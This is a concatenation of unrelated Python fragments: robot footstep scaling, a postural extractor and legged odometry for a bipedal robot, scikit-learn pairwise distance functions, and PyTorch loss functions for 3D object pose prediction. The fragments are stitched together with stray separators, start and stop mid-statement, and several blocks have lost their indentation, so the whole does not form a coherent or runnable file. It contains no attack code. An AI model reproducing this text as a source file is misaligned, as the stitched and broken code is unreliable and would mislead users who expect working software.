    """Retrieve and scale the footsteps of the generated trajectory.

    Reads the footsteps from the JSON file at ``self.footsteps_path``,
    rescales the step lengths by ``self.footstep_scaling`` while keeping the
    original orientations and the ``self.time_scaling``-scaled timings,
    stores the result in ``self.contact_phase_list``, and plots the original
    footsteps against the scaled ones.
    """
    # Names of the feet frames
    rfoot_frame = "r_sole"
    lfoot_frame = "l_sole"

    # Create the map of contact lists
    contact_list_map = {rfoot_frame: blf.contacts.ContactList(),
                        lfoot_frame: blf.contacts.ContactList()}

    # Retrieve the footsteps from a JSON file
    with open(self.footsteps_path, 'r') as infile:
        contacts = json.load(infile)

    # Process each foot with the shared helper. The first contact of each
    # foot is pinned to the nominal stance position used in Gazebo.
    # NOTE(review): the +/-0.08 lateral offsets presumably match the robot's
    # half stance width in the simulation - confirm against the Gazebo setup.
    unscaled_l_x, unscaled_l_y, scaled_l_x, scaled_l_y = self._scale_foot_contacts(
        contacts["l_foot"], [0, 0.08, 0], contact_list_map[lfoot_frame])
    unscaled_r_x, unscaled_r_y, scaled_r_x, scaled_r_y = self._scale_foot_contacts(
        contacts["r_foot"], [0, -0.08, 0], contact_list_map[rfoot_frame])

    # Plot unscaled (red) vs scaled (blue) footsteps
    plt.figure()
    plt.plot(unscaled_l_x, unscaled_l_y, 'r')
    plt.plot(unscaled_r_x, unscaled_r_y, 'r')
    plt.scatter(unscaled_l_x, unscaled_l_y, c='r')
    plt.scatter(unscaled_r_x, unscaled_r_y, c='r')
    plt.plot(scaled_l_x, scaled_l_y, 'b')
    plt.plot(scaled_r_x, scaled_r_y, 'b')
    plt.scatter(scaled_l_x, scaled_l_y, c='b')
    plt.scatter(scaled_r_x, scaled_r_y, c='b')
    plt.title("Unscaled footsteps (red) VS scaled footsteps (blue)")
    plt.axis("equal")
    plt.show(block=False)
    plt.pause(1.0)

    # Assign contact list
    phase_list = blf.contacts.ContactPhaseList()
    phase_list.set_lists(contact_lists=contact_list_map)
    self.contact_phase_list = phase_list

def _scale_foot_contacts(self, foot_contacts, gazebo_position, contact_list):
    """Scale one foot's footsteps and add them to ``contact_list``.

    The first contact is moved exactly onto ``gazebo_position`` and the same
    offset is applied to all subsequent footsteps. Each subsequent step
    (difference between consecutive unscaled contacts) is multiplied by
    ``self.footstep_scaling``; orientations and timings are taken unmodified
    from the original contacts (timings scaled by ``self.time_scaling``).

    Returns four lists for plotting: unscaled x, unscaled y, scaled x, scaled y.
    """
    # Pin the initial contact to the nominal stance position; the resulting
    # offset is reused to shift every later footstep consistently.
    ground_position = [foot_contacts[0]["2D_pos"][0], foot_contacts[0]["2D_pos"][1], 0]
    position_offset = np.array(gazebo_position) - np.array(ground_position)
    ground_position += np.array(position_offset)
    initial_rot = Rotation.from_euler('xyz', [0.0, 0.0, foot_contacts[0]["2D_orient"]])
    assert contact_list.add_contact(
        transform=manif.SE3(position=np.array(ground_position),
                            quaternion=initial_rot.as_quat()),
        activation_time=0.0,
        deactivation_time=self.time_scaling * (foot_contacts[0]["deactivation_time"]))

    # Storage for plotting
    unscaled_x = [ground_position[0]]
    unscaled_y = [ground_position[1]]
    scaled_x = [ground_position[0]]
    scaled_y = [ground_position[1]]

    # Previous unscaled and scaled contacts (both start at the initial contact)
    prev_contact = ground_position
    prev_unscaled_contact = ground_position

    # Offset-corrected (but still unscaled) positions of the later contacts
    unscaled_positions = []
    for contact in foot_contacts[1:]:
        position = [contact["2D_pos"][0], contact["2D_pos"][1], 0]
        position += np.array(position_offset)
        unscaled_positions.append(position)
        unscaled_x.append(position[0])
        unscaled_y.append(position[1])

    # Scale the contacts
    for contact, unscaled_contact in zip(foot_contacts[1:], unscaled_positions):
        # Distance between two consecutive unscaled contacts of the same foot
        distance = np.array([unscaled_contact[0], unscaled_contact[1], 0]) - np.array(prev_unscaled_contact)
        # Scale the step
        scaled_distance = self.footstep_scaling * distance
        # The next contact is the previous scaled contact plus the scaled step
        ground_position = prev_contact + [scaled_distance[0], scaled_distance[1], 0]
        # Update the variables keeping track of the previous scaled and unscaled contacts
        prev_unscaled_contact = [unscaled_contact[0], unscaled_contact[1], 0]
        prev_contact = ground_position
        # Update the storage for plotting
        scaled_x.append(ground_position[0])
        scaled_y.append(ground_position[1])
        # Orientation and timing come from the original contact
        foot_rot = Rotation.from_euler('xyz', [0.0, 0.0, contact["2D_orient"]])
        assert contact_list.add_contact(
            transform=manif.SE3(position=np.array(ground_position),
                                quaternion=foot_rot.as_quat()),
            activation_time=self.time_scaling * (contact["activation_time"]),
            deactivation_time=self.time_scaling * (contact["deactivation_time"]))

    return unscaled_x, unscaled_y, scaled_x, scaled_y
@dataclass
class PosturalExtractor:
    """Class to extract the postural at the desired frequency from the generated trajectory."""

    # Path for the file storing the generated posturals
    posturals_path: str

    # Time scaling factor
    time_scaling: int

    # Fixed offset for the shoulder pitch and roll in order to spread the arms
    shoulder_offset: float

    # Joint postural references
    joint_references: List = field(default_factory=list)

    # Shoulder joints that receive the fixed arm-spreading offset
    # (unannotated on purpose: not a dataclass field)
    _SHOULDER_JOINTS = frozenset(
        ("l_shoulder_roll", "r_shoulder_roll", "l_shoulder_pitch", "r_shoulder_pitch"))

    @staticmethod
    def build(posturals_path: str,
              time_scaling: int,
              shoulder_offset: float = 0.15) -> "PosturalExtractor":
        """Build an instance of PosturalExtractor."""
        return PosturalExtractor(posturals_path=posturals_path,
                                 time_scaling=time_scaling,
                                 shoulder_offset=shoulder_offset)

    def retrieve_joint_references(self, joints_list: List) -> None:
        """Retrieve postural references at the desired frequency from the generated trajectory.

        Each postural generated by adherent at 50 Hz is replicated
        2 * time_scaling times (2x goes from the 50 Hz trajectory generation
        frequency to the 100 Hz trajectory control frequency; time_scaling
        slows the trajectory down further). Shoulder joints get a fixed
        offset so that the arms are spread.
        """
        # Retrieve original joint posturals from a JSON file
        with open(self.posturals_path, 'r') as openfile:
            posturals = json.load(openfile)
        joint_posturals = posturals["joints"]

        # Postural references at the desired frequency
        joint_references = []

        for joint_postural in joint_posturals:
            # Build the reference once per postural (the shoulder joints are
            # offset, all the other joints are kept as they are) ...
            reference = [joint_postural[joint] + self.shoulder_offset
                         if joint in self._SHOULDER_JOINTS
                         else joint_postural[joint]
                         for joint in joints_list]
            # ... then replicate it as many times as needed. Copies are
            # appended so the replicated references do not alias each other.
            for _ in range(2 * self.time_scaling):
                joint_references.append(list(reference))

        # Assign joint references
        self.joint_references = joint_references
@dataclass
class LeggedOdometry:
"""Class for the computations related to the legged odometry estimator."""
# Legged odometry
lo_kindyn_desc: blf.floating_base_estimators.KinDynComputationsDescriptor
legged_odom: blf.floating_base_estimators.LeggedOdometry
# Fixed foot detector
fixed_foot_detector: blf.contacts.FixedFootDetector
foot_name_to_index: Dict
# Base transform and velocity
world_H_base: np.array = field(default_factory=lambda: np.array([]))
base_twist: np.array = field(default_factory=lambda: np.array([]))
# Fixed foot related quantities
fixed_foot: blf.contacts.EstimatedContact = None
fixed_foot_index: int = 0
@staticmethod
def build(robot_urdf: str, joints_list: List, dt: float, foot_name_to_index: Dict) -> "LeggedOdometry":
    """Build an instance of LeggedOdometry.

    Args:
        robot_urdf: path of the robot model file loaded by the kindyn descriptor.
        joints_list: names of the joints considered in the kinematic computations.
        dt: sampling period in seconds, shared by the estimator and the
            fixed foot detector.
        foot_name_to_index: map from foot frame name to frame index, used later
            when switching the estimator's fixed frame.
    """
    # Create KinDynComputationsDescriptor for legged odometry
    lo_kindyn_handler = blf.parameters_handler.StdParametersHandler()
    lo_kindyn_handler.set_parameter_string("model_file_name", robot_urdf)
    lo_kindyn_handler.set_parameter_vector_string("joints_list", joints_list)
    lo_kindyn_desc = blf.floating_base_estimators.construct_kindyncomputations_descriptor(lo_kindyn_handler)
    assert lo_kindyn_desc.is_valid()

    # Legged odometry configuration
    lo_params_handler = blf.parameters_handler.StdParametersHandler()
    lo_params_handler.set_parameter_float("sampling_period_in_s", dt)

    # Model info: base frame (with its IMU) and the two sole contact frames.
    model_info_group = blf.parameters_handler.StdParametersHandler()
    model_info_group.set_parameter_string("base_link", "root_link")
    model_info_group.set_parameter_string("base_link_imu", "root_link")
    model_info_group.set_parameter_string("left_foot_contact_frame", "l_sole")
    model_info_group.set_parameter_string("right_foot_contact_frame", "r_sole")
    assert (lo_params_handler.set_group("ModelInfo", model_info_group))

    # Start fixed on the left sole; "useExternal" means the fixed frame is
    # switched by the caller (driven by the fixed foot detector), not by an
    # internal switching pattern.
    lo_group = blf.parameters_handler.StdParametersHandler()
    lo_group.set_parameter_string("initial_fixed_frame", "l_sole")
    lo_group.set_parameter_string("switching_pattern", "useExternal")
    assert lo_params_handler.set_group("LeggedOdom", lo_group)

    # Instantiate legged odometry
    legged_odom = blf.floating_base_estimators.LeggedOdometry()
    legged_odom.initialize(lo_params_handler, lo_kindyn_desc.kindyn)

    # Fixed foot detector configuration (same sampling period as above).
    fixed_foot_detector_handler = blf.parameters_handler.StdParametersHandler()
    fixed_foot_detector_handler.set_parameter_float("sampling_time", dt)

    # Instantiate fixed foot detector
    fixed_foot_detector = blf.contacts.FixedFootDetector()
    fixed_foot_detector.initialize(fixed_foot_detector_handler)

    return LeggedOdometry(lo_kindyn_desc=lo_kindyn_desc,
                          legged_odom=legged_odom,
                          fixed_foot_detector=fixed_foot_detector,
                          foot_name_to_index=foot_name_to_index)
def configure(self, contact_phase_list: blf.contacts.ContactList, joints_values: np.array,
              joints_velocities: np.array) -> (np.array, np.array):
    """Initial configuration of the legged odometry estimator and the fixed foot detector.

    Args:
        contact_phase_list: planned contact phases fed to the fixed foot detector.
        joints_values: measured joint positions.
        joints_velocities: measured joint velocities.

    Returns:
        (world_H_base, base_twist): the initial base pose (homogeneous
        transform) and base velocity estimated by the legged odometry.
    """
    # Pass the list of contacts to the fixed foot detector
    self.fixed_foot_detector.set_contact_phase_list(contact_phase_list)

    # Fill measurement buffers
    self.legged_odom.set_kinematics(joints_values, joints_velocities)

    # Retrieve initial fixed foot
    self.fixed_foot = self.fixed_foot_detector.get_fixed_foot()

    # Advance the legged odometry estimator; set_contact_status must be
    # called before advance() so the estimator knows the current contact.
    assert self.legged_odom.set_contact_status(self.fixed_foot.name, self.fixed_foot.is_active,
                                               self.fixed_foot.switch_time, self.fixed_foot.last_update_time)
    assert self.legged_odom.advance()

    # Anchor the estimator to the detected fixed foot pose.
    self.fixed_foot_index = self.foot_name_to_index[self.fixed_foot.name]
    self.legged_odom.change_fixed_frame(self.fixed_foot_index, self.fixed_foot.pose.quat(),
                                        self.fixed_foot.pose.translation())

    # Retrieve the output of the legged odometry
    out = self.legged_odom.get_output()
    self.world_H_base = out.base_pose.transform()
    self.base_twist = out.base_twist

    return self.world_H_base, self.base_twist
def update(self, joints_values: np.array, joints_velocities: np.array) -> (np.array, np.array):
| |
Y.shape[1] == %d" % (
X.shape[1], Y.shape[1]))
return X, Y
def manhattan_distances(X, Y=None, sum_over_features=True,
                        size_threshold=None):
    """Compute the L1 distances between the vectors in X and Y.

    With sum_over_features equal to False it returns the componentwise
    distances.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array_like
        An array with shape (n_samples_X, n_features).
    Y : array_like, optional
        An array with shape (n_samples_Y, n_features).
    sum_over_features : bool, default=True
        If True the function returns the pairwise distance matrix
        else it returns the componentwise L1 pairwise-distances.
        Not supported for sparse matrix inputs.
    size_threshold : int, default=5e8
        Unused parameter.

    Returns
    -------
    D : array
        If sum_over_features is False shape is
        (n_samples_X * n_samples_Y, n_features) and D contains the
        componentwise L1 pairwise-distances (ie. absolute difference),
        else shape is (n_samples_X, n_samples_Y) and D contains
        the pairwise L1 distances.

    Examples
    --------
    >>> from sklearn.metrics.pairwise import manhattan_distances
    >>> manhattan_distances([[3]], [[3]])#doctest:+ELLIPSIS
    array([[ 0.]])
    >>> manhattan_distances([[3]], [[2]])#doctest:+ELLIPSIS
    array([[ 1.]])
    >>> manhattan_distances([[2]], [[3]])#doctest:+ELLIPSIS
    array([[ 1.]])
    >>> manhattan_distances([[1, 2], [3, 4]],\
         [[1, 2], [0, 3]])#doctest:+ELLIPSIS
    array([[ 0., 2.],
           [ 4., 4.]])
    >>> import numpy as np
    >>> X = np.ones((1, 2))
    >>> y = 2 * np.ones((2, 2))
    >>> manhattan_distances(X, y, sum_over_features=False)#doctest:+ELLIPSIS
    array([[ 1.,  1.],
           [ 1.,  1.]]...)
    """
    if size_threshold is not None:
        warnings.warn('Use of the "size_threshold" is deprecated '
                      'in 0.19 and it will be removed version '
                      '0.21 of scikit-learn', DeprecationWarning)

    X, Y = check_pairwise_arrays(X, Y)

    if issparse(X) or issparse(Y):
        # Sparse path: only the summed distances are implemented.
        if not sum_over_features:
            raise TypeError("sum_over_features=%r not supported"
                            " for sparse matrices" % sum_over_features)

        X = csr_matrix(X, copy=False)
        Y = csr_matrix(Y, copy=False)
        D = np.zeros((X.shape[0], Y.shape[0]))
        _sparse_manhattan(X.data, X.indices, X.indptr,
                          Y.data, Y.indices, Y.indptr,
                          X.shape[1], D)
        return D

    if sum_over_features:
        # Dense summed distances delegate to scipy's cityblock metric.
        return distance.cdist(X, Y, 'cityblock')

    # Componentwise distances: broadcast the pairwise differences and take
    # the absolute value in place.
    D = X[:, np.newaxis, :] - Y[np.newaxis, :, :]
    np.abs(D, out=D)
    return D.reshape((-1, X.shape[1]))
def cosine_distances(X, Y=None):
    """Compute cosine distance between samples in X and Y.

    Cosine distance is defined as 1.0 minus the cosine similarity.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array_like, sparse matrix
        with shape (n_samples_X, n_features).
    Y : array_like, sparse matrix (optional)
        with shape (n_samples_Y, n_features).

    Returns
    -------
    distance matrix : array
        An array with shape (n_samples_X, n_samples_Y).

    See also
    --------
    sklearn.metrics.pairwise.cosine_similarity
    scipy.spatial.distance.cosine (dense matrices only)
    """
    # Turn the similarity matrix into distances in place (no extra copy):
    # S <- 1 - S, then clip into the valid [0, 2] range.
    S = cosine_similarity(X, Y)
    np.subtract(1, S, out=S)
    np.clip(S, 0, 2, out=S)
    if X is Y or Y is None:
        # Floating point rounding can leave tiny nonzero self-distances;
        # force the diagonal to exactly zero.
        S[np.diag_indices_from(S)] = 0.0
    return S
# Mapping from metric name to the scikit-learn implementation that
# pairwise_distances() dispatches to (these support sparse inputs).
PAIRWISE_DISTANCE_FUNCTIONS = {
    # If updating this dictionary, update the doc in both distance_metrics()
    # and also in pairwise_distances()!
    'cityblock': manhattan_distances,
    'cosine': cosine_distances,
    'euclidean': euclidean_distances,
    'l2': euclidean_distances,
    'l1': manhattan_distances,
    'manhattan': manhattan_distances,
    'precomputed': None,  # HACK: precomputed is always allowed, never called
}
def pairwise_distances(X, Y=None, metric="euclidean", n_jobs=1, **kwds):
    """ Compute the distance matrix from a vector array X and optional Y.

    This method takes either a vector array or a distance matrix, and returns
    a distance matrix. If the input is a vector array, the distances are
    computed. If the input is a distances matrix, it is returned instead.

    This method provides a safe way to take a distance matrix as input, while
    preserving compatibility with many other algorithms that take a vector
    array.

    If Y is given (default is None), then the returned matrix is the pairwise
    distance between the arrays from both X and Y.

    Valid values for metric are:

    - From scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
      'manhattan']. These metrics support sparse matrix inputs.

    - From scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
      'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
      'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
      'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule']
      See the documentation for scipy.spatial.distance for details on these
      metrics. These metrics do not support sparse matrix inputs.

    Note that in the case of 'cityblock', 'cosine' and 'euclidean' (which are
    valid scipy.spatial.distance metrics), the scikit-learn implementation
    will be used, which is faster and has support for sparse matrices (except
    for 'cityblock'). For a verbose description of the metrics from
    scikit-learn, see the __doc__ of the sklearn.pairwise.distance_metrics
    function.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
             [n_samples_a, n_features] otherwise
        Array of pairwise distances between samples, or a feature array.

    Y : array [n_samples_b, n_features], optional
        An optional second feature array. Only allowed if metric != "precomputed".

    metric : string, or callable
        The metric to use when calculating distance between instances in a
        feature array. If metric is a string, it must be one of the options
        allowed by scipy.spatial.distance.pdist for its metric parameter, or
        a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
        If metric is "precomputed", X is assumed to be a distance matrix.
        Alternatively, if metric is a callable function, it is called on each
        pair of instances (rows) and the resulting value recorded. The callable
        should take two arrays from X as input and return a value indicating
        the distance between them.

    n_jobs : int
        The number of jobs to use for the computation. This works by breaking
        down the pairwise matrix into n_jobs even slices and computing them in
        parallel.

        If -1 all CPUs are used. If 1 is given, no parallel computing code is
        used at all, which is useful for debugging. For n_jobs below -1,
        (n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
        are used.

    **kwds : optional keyword parameters
        Any further parameters are passed directly to the distance function.
        If using a scipy.spatial.distance metric, the parameters are still
        metric dependent. See the scipy docs for usage examples.

    Returns
    -------
    D : array [n_samples_a, n_samples_a] or [n_samples_a, n_samples_b]
        A distance matrix D such that D_{i, j} is the distance between the
        ith and jth vectors of the given matrix X, if Y is None.
        If Y is not None, then D_{i, j} is the distance between the ith array
        from X and the jth array from Y.

    """
    # Reject unknown string metrics early, listing the valid options.
    if (metric not in _VALID_METRICS and
            not callable(metric) and metric != "precomputed"):
        raise ValueError("Unknown metric %s. "
                         "Valid metrics are %s, or 'precomputed', or a "
                         "callable" % (metric, _VALID_METRICS))

    if metric == "precomputed":
        # X already is the distance matrix; only validate its shape.
        X, _ = check_pairwise_arrays(X, Y, precomputed=True)
        return X
    elif metric in PAIRWISE_DISTANCE_FUNCTIONS:
        # Fast scikit-learn implementation (sparse-aware).
        func = PAIRWISE_DISTANCE_FUNCTIONS[metric]
    elif callable(metric):
        # User-supplied metric evaluated pairwise in Python.
        func = partial(_pairwise_callable, metric=metric, **kwds)
    else:
        # Fall back to scipy; dense inputs only.
        if issparse(X) or issparse(Y):
            raise TypeError("scipy distance metrics do not"
                            " support sparse matrices.")

        dtype = bool if metric in PAIRWISE_BOOLEAN_FUNCTIONS else None
        X, Y = check_pairwise_arrays(X, Y, dtype=dtype)

        if n_jobs == 1 and X is Y:
            # pdist exploits symmetry (upper triangle only) for X vs X.
            return distance.squareform(distance.pdist(X, metric=metric,
                                                      **kwds))
        func = partial(distance.cdist, metric=metric, **kwds)

    return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
def _return_float_dtype(X, Y):
    """Coerce X (and Y) to arrays and choose a common floating dtype.

    1. If dtype of X and Y is float32, then dtype float32 is returned.
    2. Else dtype float is returned.

    Returns
    -------
    (X, Y, dtype): possibly converted inputs plus the selected dtype.
    """
    if not issparse(X) and not isinstance(X, np.ndarray):
        X = np.asarray(X)

    if Y is None:
        Y_dtype = X.dtype
    elif not issparse(Y) and not isinstance(Y, np.ndarray):
        Y = np.asarray(Y)
        Y_dtype = Y.dtype
    else:
        Y_dtype = Y.dtype

    if X.dtype == Y_dtype == np.float32:
        dtype = np.float32
    else:
        # Builtin `float` (array dtype float64). The historical `np.float`
        # alias used here before was deprecated in NumPy 1.20 and removed in
        # NumPy 1.24, so it now raises AttributeError; `float` is the exact
        # equivalent.
        dtype = float

    return X, Y, dtype
def _parallel_pairwise(X, Y, func, n_jobs, **kwds):
    """Break the pairwise matrix into n_jobs even slices and compute them
    in parallel."""
    if n_jobs < 0:
        # Negative n_jobs means "all CPUs except (-n_jobs - 1)".
        n_jobs = max(cpu_count() + 1 + n_jobs, 1)

    Y = X if Y is None else Y

    if n_jobs == 1:
        # Special case to avoid picklability checks in delayed
        return func(X, Y, **kwds)

    # TODO: in some cases, backend='threading' may be appropriate
    dispatch = delayed(func)
    ret = Parallel(n_jobs=n_jobs, verbose=0)(
        dispatch(X, Y[s], **kwds)
        for s in gen_even_slices(Y.shape[0], n_jobs))
    return np.hstack(ret)
def _pairwise_callable(X, Y, metric, **kwds):
"""Handle the callable case for pairwise_{distances,kernels}
"""
X, Y = check_pairwise_arrays(X, Y)
if X is Y:
# Only calculate metric for upper triangle
out = np.zeros((X.shape[0], Y.shape[0]), dtype='float')
iterator = | |
'''
Loss building blocks.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import math
from absl import flags
import numpy as np
import pdb
import itertools
from ..utils import suncg_parse
# from ..utils import quatUtils
# -------------- flags -------------#
# ----------------------------------#
# Weights for the individual terms combined in code_loss().
flags.DEFINE_float('shape_loss_wt', 1, 'Shape loss weight.')
flags.DEFINE_float('scale_loss_wt', 1, 'Scale loss weight.')
flags.DEFINE_float('quat_loss_wt', 1, 'Quat loss weight.')
flags.DEFINE_float('trans_loss_wt', 1, 'Trans loss weight.')
flags.DEFINE_float('delta_trans_loss_wt', 1, 'Delta Trans loss weight.')
flags.DEFINE_float('rel_trans_loss_wt', 1,
                   'Relative location loss weight.')
flags.DEFINE_float('rel_quat_loss_wt', 1,
                   'Relative location loss weight.')
flags.DEFINE_boolean('rel_opt', False,
                     'rel optim to locations')
flags.DEFINE_integer('auto_rel_opt', -1,
                     'rel optim to locations and scale after half epochs')
flags.DEFINE_boolean('train_var', False,
                     'Train variance for the GMM')

# 7-tap 1-D smoothing kernel (approximately Gaussian), shaped (1, 1, 7) for
# conv1d. NOTE(review): .cuda() at import time makes this module require a
# CUDA device just to be imported — confirm that is intended.
kernel = Variable(torch.FloatTensor([[[0.006, 0.061, 0.242, 0.383, 0.242, 0.061, 0.006]]])).cuda()
# kernel = Variable(
#     torch.FloatTensor([[[0.00, 0.0, 0.0, 1, 0.0, 0.00, 0.00]]])).cuda()
class LeastSquareOpt:
    """Least-squares solver reconciling absolute and pairwise-relative locations.

    Solves min_x ||A x - b||^2 where the first n*(n-1) rows of A encode the
    relative constraints (x_j - x_i = rel_ij) and the last n rows anchor each
    x_j to its absolute prediction, weighted by lmbda. The pseudo-inverse
    (A^T A)^-1 A^T is cached per object count in Adict.

    NOTE(review): the cached matrix is moved to the GPU, so a CUDA device is
    required to use this class.
    """
    def __init__(self):
        # Cache: n_objects -> precomputed pseudo-inverse (on GPU).
        self.Adict = {}
        # Weight of the absolute-location anchoring rows.
        self.lmbda = 1

    def get_matrix_Ab(self, n_objects, trans_location, relative_locations):
        """Return (pinv(A), b) for a scene with n_objects objects.

        Args:
            n_objects: number of objects.
            trans_location: absolute location predictions, indexable by j.
            relative_locations: flat sequence indexed by i*n_objects + j
                holding the predicted offset from object i to object j.
        """
        lmbda = self.lmbda
        b = []
        # b = torch.cat([relative_locations, trans_location], dim=0)
        # Stack the relative constraints (i != j) followed by the absolute
        # anchors, matching the row layout of A built below.
        for i in range(n_objects):
            for j in range(n_objects):
                if i == j:
                    continue
                b.append(relative_locations[i*n_objects + j])
        for j in range(n_objects):
            b.append(trans_location[j])
        b = torch.stack(b)
        # NOTE(review): b is rebuilt on every call even when A is cached;
        # only the pseudo-inverse below is reused.
        if n_objects in self.Adict.keys():
            return self.Adict[n_objects], b
        else:
            # n*(n-1) relative rows + n anchor rows == n*n rows total.
            A = np.zeros((n_objects*n_objects, n_objects))
            index = 0
            for i in range(n_objects):
                for j in range(n_objects):
                    if i == j:
                        continue
                    A[index][i] = -1
                    A[index][j] = 1
                    index += 1
            for i in range(n_objects):
                A[index][i] = lmbda*1
                index += 1
            AtAInvAt = np.matmul(np.linalg.inv(np.matmul(A.transpose(), A)), A.transpose())
            self.Adict[n_objects] = Variable(torch.from_numpy(AtAInvAt).float().cuda())
            return self.Adict[n_objects], b
def normalize_probs(probs):
    """Normalize along the last dimension so the values sum to one."""
    return probs / probs.sum(dim=-1, keepdim=True)
def quat_nll_loss_or(quat_pred, quat_gt):
    """Disjunctive ("or") NLL over a set of acceptable quaternion bins.

    For each ground-truth bin i, the other ground-truth bins are masked out
    of the predicted distribution before renormalizing, the NLL of bin i is
    computed, and the smallest of the per-bin losses is returned (implemented
    as a max-pool over the negated losses).

    Args:
        quat_pred: (n_bins,) log-probabilities over quaternion bins.
        quat_gt: (k,) indices of the acceptable bins.
    Returns:
        (1, 1, 1) tensor with the minimum per-bin NLL.

    NOTE(review): requires a CUDA device (mask tensors are moved to GPU).
    """
    loss = []
    quat_gt_tensor = quat_gt.data.cpu()
    # Back to probabilities; the epsilon guards the normalize/log below.
    quat_pred = quat_pred.exp() + 1E-5
    for i in range(len(quat_gt)):
        # Mask keeps all non-ground-truth bins, drops the other gt bins,
        # then re-enables only the current gt bin i.
        mask = torch.zeros(len(quat_pred)) + 1
        mask = mask.scatter_(0, quat_gt_tensor, 0)
        mask.scatter_(0, quat_gt[i].data.cpu(), 1)
        mask = Variable(mask.cuda())
        quat_probs = normalize_probs(quat_pred*mask) + 1E-5
        # NOTE(review): gt_probs is computed but never used — dead code.
        gt_probs = Variable(torch.zeros(len(quat_pred)).scatter_(0, quat_gt[i].data.cpu(), 1)).cuda()
        loss.append(-1*quat_probs[quat_gt[i]].log())
    # min over bins == -max over negated losses; max_pool1d wants (N, C, L).
    loss = -1*torch.nn.functional.max_pool1d(-1*torch.stack(loss).view(1,1, -1), kernel_size=len(quat_gt))
    return loss
def quat_nll_loss_and(quat_pred, quat_gt, class_weights=None):
    """Conjunctive ("and") NLL over a set of ground-truth quaternion bins.

    The target is a uniform distribution putting mass 1/k on each of the k
    bins in quat_gt; the loss is the cross entropy between that target and
    the predicted log-probabilities.

    (Cleanup: removed the dead locals `loss = []` and `quat_gt_tensor`,
    the latter of which forced a needless device-to-CPU copy.)

    Args:
        quat_pred: (n_bins,) log-probabilities over quaternion bins.
        quat_gt: (k,) long tensor of ground-truth bin indices.
        class_weights: optional (n_bins,) per-bin weights.
    Returns:
        Scalar loss tensor.
    """
    # Build the target distribution: 1/k mass on each ground-truth bin.
    gts = 0*quat_pred.data
    gts.scatter_(0, quat_gt.data, 1.0/len(quat_gt))
    if class_weights is None:
        loss = -1*(Variable(gts)* quat_pred ).sum()
    else:
        loss = -1*(Variable(gts)* quat_pred*class_weights).sum()
    return loss
def quat_loss(q1, q2, average=True):
    '''
    Anti-podal squared L2 loss.

    A quaternion and its negation represent the same rotation, so the loss
    for each row is the smaller of ||q1 - q2||^2 and ||q1 + q2||^2.

    Args:
        q1: N X 4
        q2: N X 4
    Returns:
        loss : scalar mean if average, else per-row (N,) losses
    '''
    diff_sq = (q1 - q2).pow(2).sum(1)
    anti_sq = (q1 + q2).pow(2).sum(1)
    per_row = torch.min(diff_sq, anti_sq)
    return per_row.mean() if average else per_row
def dir_loss1(q1, q2, average=True):
    """Angular loss (arccos of the dot product) between unit directions.

    The clamp keeps acos away from its non-differentiable endpoints +/-1.
    Returns the scalar mean if average, else the per-row angles.
    """
    cos_sim = torch.clamp(torch.sum(q1*q2, dim=1), -1 + 1E-5, 1 - 1E-5)
    angles = torch.acos(cos_sim)
    if average:
        return angles.mean()
    return angles
def dir_loss2(q1, q2, average=True):
    """Squared L2 loss between direction vectors.

    Fix: the `average` flag was previously ignored (the mean was always
    returned); it now behaves like the sibling dir_loss helpers.

    Args:
        q1: N x D
        q2: N x D
        average: if True return the scalar mean, else per-row (N,) losses.
    """
    per_row = torch.sum((q1 - q2)**2, 1)
    if average:
        return per_row.mean()
    return per_row
def dir_loss(q1, q2, average=True):
    """One-minus-dot-product loss between unit direction vectors.

    Zero when the directions coincide; returns the scalar mean if average,
    else the per-row values.
    """
    dissimilarity = 1 - torch.sum(q1*q2, dim=1)
    return dissimilarity.mean() if average else dissimilarity
def nll_loss_with_mask(log_probs, gts, mask):
    '''
    NLL loss computed only over the examples selected by mask.

    Args:
        log_probs: (N, bins) log-probabilities.
        gts: (N,) target bin indices.
        mask: (N,) boolean selection mask.
    Returns:
        Scalar loss (a zero tensor when nothing is selected).
    '''
    bins = log_probs.size(-1)
    row_mask = mask.unsqueeze(1).expand(log_probs.size())
    selected_log_probs = torch.masked_select(log_probs, row_mask).view(-1, bins)
    selected_gts = torch.masked_select(gts, mask)
    if len(selected_gts) > 0:
        return torch.nn.functional.nll_loss(selected_log_probs, selected_gts)
    # Nothing selected: return a zero of the same dtype/device.
    return Variable(torch.Tensor([0]).type_as(selected_log_probs.data))
def quat_dist(q1, q2):
    '''
    Geodesic rotation distance between quaternion batches.

    N x M x 4, N x M x 4 -> N x M angles; the clamp guards acos against
    rounding slightly outside [-1, 1].
    '''
    dot_sq = (q1*q2).sum(-1).pow(2)
    return torch.acos(torch.clamp(2*dot_sq - 1, -1, 1))
def dir_dist(q1, q2):
    '''
    Angle between unit direction batches.

    N x M x 4, N x M x 4 -> N x M angles; the clamp guards acos against
    rounding slightly outside [-1, 1].
    '''
    cos_angle = torch.clamp((q1*q2).sum(-1), -1, 1)
    return torch.acos(cos_angle)
def code_loss(
code_pred, code_gt, rois,
relative_pred, relative_gt, bIndices_pairs,
class_pred, class_gt,
quat_medoids = None, direction_medoids=None,
pred_class=False, pred_voxels=True, classify_rot=True, classify_dir=True, classify_trj=True, pred_relative=False,
shape_wt=1.0, scale_wt=1.0, quat_wt=1.0, trans_wt=1.0, rel_trans_wt=1.0, rel_quat_wt=1.0, class_wt=1.0,
lsopt=None, rel_opt=False, class_weights=None, opts=None):
'''
Code loss
Args:
code_pred: [shape, scale, quat, trans, delta_trans]
code_gt: [shape, scale, quat, trans]
trajectories_pred : [ n x n x 10 x 3]
Returns:
total_loss : scalar
'''
if opts is None:
gmm_rot = False
var_gmm_rot = False
train_var = False
gmm_dir = False
else:
gmm_rot = False
var_gmm_rot = opts.var_gmm_rot
train_var = opts.train_var
gmm_dir = opts.gmm_dir
if pred_voxels:
